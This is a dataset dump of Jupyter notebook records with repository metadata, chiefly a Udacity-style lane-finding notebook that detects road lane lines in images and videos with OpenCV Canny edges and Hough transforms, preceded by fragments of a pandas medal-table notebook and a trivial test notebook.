"import pandas as pd\n\n# Create an empty dataframe\ncolumns = ['country','sport','medal','N']\ndf = pd.DataFrame(columns=columns)\n\n# Identify all countries with at least 1 medal\ncountries_list = list(set(reduce(lambda x,y: x+y,sports_countries.values())))\ncountries_list = sorted(countries_list)\n# Fill dataframe\nfor s in sports_names:\n if thtmls[s]:\n for i,c in enumerate(countries_list):\n ci = all_countries_format_list[i]\n for m in medal_names:\n if c in sports_countries[s]:\n rowtemp = [ci, s, m, medals[s][c][m]]\n else:\n rowtemp = [ci, s, m, 0]\n dftemp = pd.DataFrame([rowtemp], columns=columns)\n df =df.append(dftemp)",
"_____no_output_____"
]
],
[
[
"# Save dataframe",
"_____no_output_____"
]
],
[
[
"df.to_csv('now_medals.csv')",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb53d21619790f37e21a6331ed3bbd7c6d0fd8bc | 948 | ipynb | Jupyter Notebook | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | task_1/bert_svm.ipynb | icobx/claim_detection | f6ba48e4406d3308c869f1ef42ce6ca3c0f54141 | [
"MIT"
] | null | null | null | 16.928571 | 77 | 0.520042 | [
[
[
"print('hello')",
"hello\n"
],
[
"from",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code"
]
] |
cb53d78ec66f1f7cd4cce54f98983a8dbce940de | 610,206 | ipynb | Jupyter Notebook | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | lane_finding/lane_finding.ipynb | donghankim/Detecting-Car-Lanes | 7fd56148ad9eed4dabcedfdf6484c095797ab310 | [
"MIT"
] | null | null | null | 791.447471 | 230,124 | 0.949127 | [
[
[
"# Self-Driving Car Engineer Nanodegree\n\n\n## Project: **Finding Lane Lines on the Road** \n***\nIn this project, you will use the tools you learned about in the lesson to identify lane lines on the road. You can develop your pipeline on a series of individual images, and later apply the result to a video stream (really just a series of images). Check out the video clip \"raw-lines-example.mp4\" (also contained in this repository) to see what the output should look like after using the helper functions below. \n\nOnce you have a result that looks roughly like \"raw-lines-example.mp4\", you'll need to get creative and try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video \"P1_example.mp4\". Ultimately, you would like to draw just one line for the left side of the lane, and one for the right.\n\nIn addition to implementing code, there is a brief writeup to complete. The writeup should be completed in a separate file, which can be either a markdown file or a pdf document. There is a [write up template](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) that can be used to guide the writing process. Completing both the code in the Ipython notebook and the writeup template will cover all of the [rubric points](https://review.udacity.com/#!/rubrics/322/view) for this project.\n\n---\nLet's have a look at our first image called 'test_images/solidWhiteRight.jpg'. Run the 2 cells below (hit Shift-Enter or the \"play\" button above) to display the image.\n\n**Note: If, at any point, you encounter frozen display windows or other confounding issues, you can always start again with a clean slate by going to the \"Kernel\" menu above and selecting \"Restart & Clear Output\".**\n\n---",
"_____no_output_____"
],
[
"**The tools you have are color selection, region of interest selection, grayscaling, Gaussian smoothing, Canny Edge Detection and Hough Tranform line detection. You are also free to explore and try other techniques that were not presented in the lesson. Your goal is piece together a pipeline to detect the line segments in the image, then average/extrapolate them and draw them onto the image for display (as below). Once you have a working pipeline, try it out on the video stream below.**\n\n---\n\n<figure>\n <img src=\"examples/line-segments-example.jpg\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your output should look something like this (above) after detecting line segments using the helper functions below </p> \n </figcaption>\n</figure>\n <p></p> \n<figure>\n <img src=\"examples/laneLines_thirdPass.jpg\" width=\"380\" alt=\"Combined Image\" />\n <figcaption>\n <p></p> \n <p style=\"text-align: center;\"> Your goal is to connect/average/extrapolate line segments to get output like this</p> \n </figcaption>\n</figure>",
"_____no_output_____"
],
[
"**Run the cell below to import some packages. If you get an `import error` for a package you've already installed, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.** ",
"_____no_output_____"
],
[
"## Import Packages",
"_____no_output_____"
]
],
[
[
"#importing some useful packages\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport math\nimport pdb, os\nfrom collections.abc import Mapping\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"## Read in an Image",
"_____no_output_____"
]
],
[
[
"#reading in an image\nimage = mpimg.imread('test_images/solidWhiteRight.jpg')\n\n#printing out some stats and plotting\nprint('This image is:', type(image), 'with dimensions:', image.shape)\nplt.imshow(image) # if you wanted to show a single color channel image called 'gray', for example, call as plt.imshow(gray, cmap='gray')",
"This image is: <class 'numpy.ndarray'> with dimensions: (540, 960, 3)\n"
]
],
[
[
"## Ideas for Lane Detection Pipeline",
"_____no_output_____"
],
[
"**Some OpenCV functions (beyond those introduced in the lesson) that might be useful for this project are:**\n\n`cv2.inRange()` for color selection \n`cv2.fillPoly()` for regions selection \n`cv2.line()` to draw lines on an image given endpoints \n`cv2.addWeighted()` to coadd / overlay two images\n`cv2.cvtColor()` to grayscale or change color\n`cv2.imwrite()` to output images to file \n`cv2.bitwise_and()` to apply a mask to an image\n\n**Check out the OpenCV documentation to learn about these and discover even more awesome functionality!**",
"_____no_output_____"
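],
[
"The pipeline below does not use `cv2.inRange()`, so here is a small, hedged sketch of how color selection with it could look. This is only an illustrative aside, not part of the project pipeline; the threshold values are assumptions and would need tuning for real images.\n\n```python\nimport cv2\nimport numpy as np\n\ndef select_white_yellow(rgb_img):\n    # keep near-white pixels in RGB and yellow-ish pixels in HSV, mask out everything else\n    white_mask = cv2.inRange(rgb_img, np.array([200, 200, 200]), np.array([255, 255, 255]))\n    hsv = cv2.cvtColor(rgb_img, cv2.COLOR_RGB2HSV)\n    yellow_mask = cv2.inRange(hsv, np.array([15, 80, 100]), np.array([35, 255, 255]))\n    mask = cv2.bitwise_or(white_mask, yellow_mask)\n    return cv2.bitwise_and(rgb_img, rgb_img, mask=mask)\n```\n\nApplying a mask like this before grayscaling can make the Canny and Hough steps less sensitive to shadows and pavement texture.",
"_____no_output_____"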
]
],
[
[
"# Helper Functions\n\ndef show_img(img_dict):\n if not isinstance(img_dict, Mapping):\n plt.imshow(img_dict)\n return\n elif len(img_dict) == 1:\n plt.imshow(img_dict.values[0]) \n return\n else:\n col = 3\n row = 1\n values_list = list(img_dict.values())\n \n fig, axes = plt.subplots(row, col, figsize = (16, 8))\n fig.subplots_adjust(hspace = 0.1, wspace = 0.2)\n axes.ravel()\n \n axes[0].imshow(values_list[0])\n axes[1].imshow(values_list[1])\n axes[2].imshow(values_list[2])\n \n\ndef grayscale(img):\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \ndef canny(img, low_threshold, high_threshold):\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n `vertices` should be a numpy array of integer points.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img) \n \n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n \n #filling pixels inside the polygon defined by \"vertices\" with the fill color \n cv2.fillPoly(mask, vertices, ignore_mask_color)\n \n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\n \ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap, default):\n \"\"\"\n `img` should be the output of a Canny transform.\n \n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)\n if default:\n draw_default_lines(line_img, lines)\n else:\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\ndef weighted_img(img, initial_img, α=0.8, β=1., γ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n \n `initial_img` should be the image before any processing.\n \n The result image is computed as follows:\n \n initial_img * α + img * β + γ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, γ)\n\n\ndef draw_default_lines(img, lines, color=[255, 0, 0], thickness=5):\n for line in lines:\n for x1,y1,x2,y2 in line:\n cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n \n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=10):\n \"\"\" \n This function draws `lines` with `color` and `thickness`. 
\n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n # Track gradient and intercept of left and right lane\n left_slope = []\n left_intercept = []\n left_y = []\n \n right_slope = []\n right_intercept = []\n right_y = []\n \n \n for line in lines:\n for x1,y1,x2,y2 in line:\n slope = (y2-y1)/(x2-x1)\n intercept = y2 - (slope*x2)\n \n # right lane\n if slope > 0.0 and slope < math.inf and abs(slope) > 0.3:\n right_slope.append(slope)\n right_intercept.append(intercept)\n right_y.append(y1)\n right_y.append(y2)\n\n # left lane\n elif slope < 0.0 and slope > -math.inf and abs(slope) > 0.3:\n left_slope.append(slope)\n left_intercept.append(intercept)\n left_y.append(y1)\n left_y.append(y2)\n \n \n y_min = min(min(left_y), min(right_y)) + 40\n y_max = img.shape[0]\n l_m = np.mean(left_slope)\n l_c = np.mean(left_intercept)\n r_m = np.mean(right_slope)\n r_c = np.mean(right_intercept)\n \n l_x_max = int((y_max - l_c)/l_m)\n l_x_min = int((y_min - l_c)/l_m) \n r_x_max = int((y_max - r_c)/r_m)\n r_x_min = int((y_min - r_c)/r_m)\n\n #pdb.set_trace()\n cv2.line(img, (l_x_max, y_max),(l_x_min, y_min), color, thickness)\n cv2.line(img, (r_x_max, y_max),(r_x_min, y_min), color, thickness)",
"_____no_output_____"
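],
[
"# Optional sanity check (an illustrative aside, not one of the original project steps):\n# run the grayscale -> blur -> Canny portion of the pipeline on the sample image loaded above\n# so the edge map can be inspected before adding the region mask and the Hough transform.\n# The threshold values below are assumptions and may need tuning.\nsample_gray = grayscale(image)\nsample_blur = gaussian_blur(sample_gray, kernel_size=3)\nsample_edges = canny(sample_blur, low_threshold=75, high_threshold=150)\nplt.imshow(sample_edges, cmap='gray')",
"_____no_output_____"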
]
],
[
[
"## Build a Lane Finding Pipeline\n\n",
"_____no_output_____"
],
[
"Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.\n\nTry tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.",
"_____no_output_____"
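],
[
"One way to explore the Canny and Hough parameters is a small sweep over a few candidate values with a visual comparison of the resulting edge maps. The snippet below is only a hedged sketch: `image` and the helper functions come from the cells above, and the candidate values are assumptions rather than recommended settings.\n\n```python\ncandidates = [(50, 100), (75, 150), (100, 200)]  # (low_threshold, high_threshold) pairs to try\nfig, axes = plt.subplots(1, len(candidates), figsize=(16, 4))\nfor ax, (low, high) in zip(axes, candidates):\n    edges = canny(gaussian_blur(grayscale(image), kernel_size=3), low, high)\n    ax.imshow(edges, cmap='gray')\n    ax.set_title('Canny {}/{}'.format(low, high))\n```\n\nA similar loop over the Hough `threshold`, `min_line_len` and `max_line_gap` values can help when choosing the line-detection parameters.",
"_____no_output_____"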
]
],
[
[
"# This cell creates a dictionary of all of the images in 'test_images' folder\ndef get_images(IMG_PATH = None):\n if IMG_PATH == None:\n test_imgs = os.listdir(\"test_images/\")\n IMG_PATH = \"test_images/\"\n else:\n test_imgs = os.listdir(IMG_PATH)\n \n # create an array that contains all test images\n img_dict = {}\n for image in test_imgs:\n img_dict[image] = mpimg.imread(os.path.join(IMG_PATH, image))\n \n return img_dict",
"_____no_output_____"
],
[
"# outputs lanes for all images in image dictionary\n\ndef interpolate(lanes, img):\n # Interpolating lines\n result = weighted_img(lanes, img)\n return result\n\ndef get_lanes(img_dict, default = False):\n if isinstance(img_dict, Mapping):\n for image in img_dict.keys():\n test_img = img_dict[image]\n # Converting to grayscale\n gray_img = grayscale(test_img)\n blur_img = gaussian_blur(gray_img, kernel_size = 3)\n\n # Computing Edges\n edges = canny(blur_img, low_threshold = 75, high_threshold = 150)\n\n # Extracting Region of Interest\n points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)\n ROI = region_of_interest(edges, [points])\n\n # Performing Hough Transform and draw lanes\n lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)\n if default:\n img_dict[image] = lanes\n else:\n res = interpolate(lanes, test_img)\n img_dict[image] = res\n return img_dict\n \n # from video frames\n else:\n gray_img = grayscale(img_dict)\n blur_img = gaussian_blur(gray_img, kernel_size = 3)\n\n # Computing Edges\n edges = canny(blur_img, low_threshold = 75, high_threshold = 150)\n\n # Extracting Region of Interest\n points = np.array([[130,600],[380,300],[650,300],[900,550]], dtype=np.int32)\n ROI = region_of_interest(edges, [points])\n\n # Performing Hough Transform and draw lanes\n lanes = hough_lines(ROI, 2, np.pi/180, 15, 5, 25, default)\n res = interpolate(lanes, img_dict)\n return res",
"_____no_output_____"
],
[
"img_dict = get_images()\nshow_img(img_dict)",
"_____no_output_____"
],
[
"default_lanes = get_lanes(img_dict, True)\nshow_img(default_lanes)",
"_____no_output_____"
],
[
"img_dict = get_images()\nfinal_output = get_lanes(img_dict)\nshow_img(final_output)",
"_____no_output_____"
],
[
"# This block will automatically compute and save the lanes to the folder 'test_images_output'\n\ndef compute_test_images(img_dict):\n \n # compute the lanes for all test_images\n lanes_dict = get_lanes(img_dict)\n \n # save outputs to 'test_images_output'\n for image in lanes_dict.keys():\n PATH = 'test_images_output/'\n mpimg.imsave(os.path.join(PATH, image), img_dict[image])\n \ncompute_test_images(img_dict)",
"/opt/conda/lib/python3.6/site-packages/ipykernel_launcher.py:112: RuntimeWarning: divide by zero encountered in int_scalars\n"
]
],
[
[
"## Test on Videos\n\nYou know what's cooler than drawing lanes over images? Drawing lanes over video!\n\nWe can test our solution on two provided videos:\n\n`solidWhiteRight.mp4`\n\n`solidYellowLeft.mp4`\n\n**Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**\n\n**If you get an error that looks like this:**\n```\nNeedDownloadError: Need ffmpeg exe. \nYou can download it by calling: \nimageio.plugins.ffmpeg.download()\n```\n**Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**",
"_____no_output_____"
]
],
[
[
"# Import everything needed to edit/save/watch video clips\nfrom moviepy.editor import VideoFileClip\nfrom IPython.display import HTML",
"_____no_output_____"
],
[
"def process_image(image):\n # NOTE: The output you return should be a color image (3 channel) for processing video below\n # TODO: put your pipeline here,\n # you should return the final output (image where lines are drawn on lanes)\n result = get_lanes(image)\n return result\n",
"_____no_output_____"
]
],
[
[
"Let's try the one with the solid white lane on the right first ...",
"_____no_output_____"
]
],
[
[
"white_output = 'test_videos_output/solidWhiteRight.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip1 = VideoFileClip(\"test_videos/solidWhiteRight.mp4\").subclip(0,5)\nclip1 = VideoFileClip(\"test_videos/solidWhiteRight.mp4\")\nwhite_clip = clip1.fl_image(process_image) #NOTE: this function expects color images!!\n%time white_clip.write_videofile(white_output, audio=False)",
"[MoviePy] >>>> Building video test_videos_output/solidWhiteRight.mp4\n[MoviePy] Writing video test_videos_output/solidWhiteRight.mp4\n"
]
],
[
[
"Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.",
"_____no_output_____"
]
],
[
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(white_output))",
"_____no_output_____"
]
],
[
[
"## Improve the draw_lines() function\n\n**At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video \"P1_example.mp4\".**\n\n**Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line over the right lane line. The lines should start from the bottom of the image and extend out to the top of the region of interest.**",
"_____no_output_____"
],
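[
"As a concrete illustration of the averaging and extrapolation idea: each Hough segment gives a slope `m = (y2 - y1) / (x2 - x1)` and an intercept `c = y1 - m * x1`; segments with negative slope are grouped as the left lane and positive slope as the right lane, the `m` and `c` values of each group are averaged, and the averaged line is evaluated at the bottom of the image and at the top of the region of interest via `x = (y - c) / m`. A tiny numeric sketch with made-up segment coordinates, purely for illustration:\n\n```python\nimport numpy as np\n\n# two made-up right-lane segments, each as (x1, y1, x2, y2)\nsegments = [(520, 330, 700, 430), (560, 350, 740, 460)]\nslopes = [(y2 - y1) / (x2 - x1) for x1, y1, x2, y2 in segments]\nintercepts = [y1 - m * x1 for (x1, y1, x2, y2), m in zip(segments, slopes)]\nm, c = np.mean(slopes), np.mean(intercepts)\n\ny_bottom, y_top = 540, 330                    # image height and top of the region of interest\nx_bottom, x_top = (y_bottom - c) / m, (y_top - c) / m\nprint(int(x_bottom), int(x_top))              # x coordinates of the single extrapolated right-lane line\n```",
"_____no_output_____"
],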
[
"Now for the one with the solid yellow lane on the left. This one's more tricky!",
"_____no_output_____"
]
],
[
[
"yellow_output = 'test_videos_output/solidYellowLeft.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip2 = VideoFileClip('test_videos/solidYellowLeft.mp4').subclip(0,5)\nclip2 = VideoFileClip('test_videos/solidYellowLeft.mp4')\nyellow_clip = clip2.fl_image(process_image)\n%time yellow_clip.write_videofile(yellow_output, audio=False)",
"_____no_output_____"
],
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(yellow_output))",
"_____no_output_____"
]
],
[
[
"## Writeup and Submission\n\nIf you're satisfied with your video outputs, it's time to make the report writeup in a pdf or markdown file. Once you have this Ipython notebook ready along with the writeup, it's time to submit for review! Here is a [link](https://github.com/udacity/CarND-LaneLines-P1/blob/master/writeup_template.md) to the writeup template file.\n",
"_____no_output_____"
],
[
"## Optional Challenge\n\nTry your lane finding pipeline on the video below. Does it still work? Can you figure out a way to make it more robust? If you're up for the challenge, modify your pipeline so it works with this video and submit it along with the rest of your project!",
"_____no_output_____"
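],
[
"One likely source of trouble on the challenge clip is that the region-of-interest vertices in `get_lanes()` are hard-coded for 960x540 frames, while the challenge video frames are larger. A hedged sketch of a more size-independent region (the fractions here are assumptions to experiment with, not a verified fix):\n\n```python\nimport numpy as np\n\ndef relative_roi_vertices(img, top_frac=0.6, top_width_frac=0.08, bottom_margin_frac=0.08):\n    # build the trapezoidal region of interest from the frame size instead of fixed pixel coordinates\n    h, w = img.shape[:2]\n    return np.array([[\n        (int(w * bottom_margin_frac), h),\n        (int(w * (0.5 - top_width_frac)), int(h * top_frac)),\n        (int(w * (0.5 + top_width_frac)), int(h * top_frac)),\n        (int(w * (1 - bottom_margin_frac)), h),\n    ]], dtype=np.int32)\n```\n\nCombining this with a white/yellow color mask before grayscaling (see the `cv2.inRange()` sketch earlier in the notebook) tends to help with the shadows and lighter pavement in the challenge video.",
"_____no_output_____"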
]
],
[
[
"challenge_output = 'test_videos_output/challenge.mp4'\n## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video\n## To do so add .subclip(start_second,end_second) to the end of the line below\n## Where start_second and end_second are integer values representing the start and end of the subclip\n## You may also uncomment the following line for a subclip of the first 5 seconds\n##clip3 = VideoFileClip('test_videos/challenge.mp4').subclip(0,5)\nclip3 = VideoFileClip('test_videos/challenge.mp4')\nchallenge_clip = clip3.fl_image(process_image)\n%time challenge_clip.write_videofile(challenge_output, audio=False)",
"_____no_output_____"
],
[
"HTML(\"\"\"\n<video width=\"960\" height=\"540\" controls>\n <source src=\"{0}\">\n</video>\n\"\"\".format(challenge_output))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |